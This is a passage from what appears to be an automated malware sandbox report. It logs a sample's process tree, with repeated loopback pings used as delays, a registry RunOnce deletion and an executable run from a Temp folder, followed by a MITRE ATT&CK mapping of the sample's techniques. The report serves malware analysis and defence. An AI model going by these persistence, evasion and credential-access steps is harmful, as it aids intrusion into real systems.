  ping 127.0.0.1 -n 1
  2⤵
  PID:12556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:3584
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2016
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13188
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:632
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3448
- C:\Windows\system32\reg.exe
  reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 26409982-ecd6-4488-8672-81e093803f43 /f
  2⤵
  - Modifies registry key
  PID:13072

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:10384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion